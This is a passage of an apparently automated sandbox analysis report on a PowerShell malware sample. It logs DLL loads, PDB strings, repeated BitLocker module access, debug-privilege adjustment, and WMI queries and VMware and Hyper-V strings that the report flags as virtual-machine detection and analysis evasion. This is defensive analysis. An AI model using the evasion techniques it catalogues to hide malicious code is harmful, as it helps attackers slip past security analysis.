Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: softy.pdb source: powershell.exe, 00000000.00000002.2323525434.0000016B4ED37000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2323525434.0000016B4ECB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb% source: powershell.exe, 00000000.00000002.2323525434.0000016B4ECB9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb( source: powershell.exe, 00000000.00000002.2271390686.0000016B34882000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2271390686.0000016B34882000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089~ source: powershell.exe, 00000000.00000002.2323525434.0000016B4ED37000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2321582106.0000016B4EC3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbdll source: powershell.exe, 00000000.00000002.2323525434.0000016B4ED37000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD346ED2A5 pushad ; iretd 0_2_00007FFD346ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34809EFD pushad ; iretd 0_2_00007FFD34809F01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348000BD pushad ; iretd 0_2_00007FFD348000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34A75FED pushad ; iretd 0_2_00007FFD34A760CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34A75F36 pushad ; iretd 0_2_00007FFD34A760CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34AB6E02 push ss; iretd 0_2_00007FFD34AB6E07
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34AB7EE8 push cs; retf 0_2_00007FFD34AB7EF1

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5018Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4819Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5492Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1432Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: powershell.exe, 00000000.00000002.2272509020.0000016B37770000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.2323525434.0000016B4ECB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.2272509020.0000016B37770000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine`S.
Source: powershell.exe, 00000000.00000002.2272509020.0000016B37770000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.2272509020.0000016B37770000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: svchost.exe, 0000000B.00000002.3426561602.0000028744454000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.3425545772.000002873EE29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.3426530748.000002874442E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000000.00000002.2272509020.0000016B37770000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.2272509020.0000016B37770000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.2272509020.0000016B37770000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.2323525434.0000016B4ED37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.2272509020.0000016B37770000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware`S.
Source: powershell.exe, 00000000.00000002.2272509020.0000016B37770000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
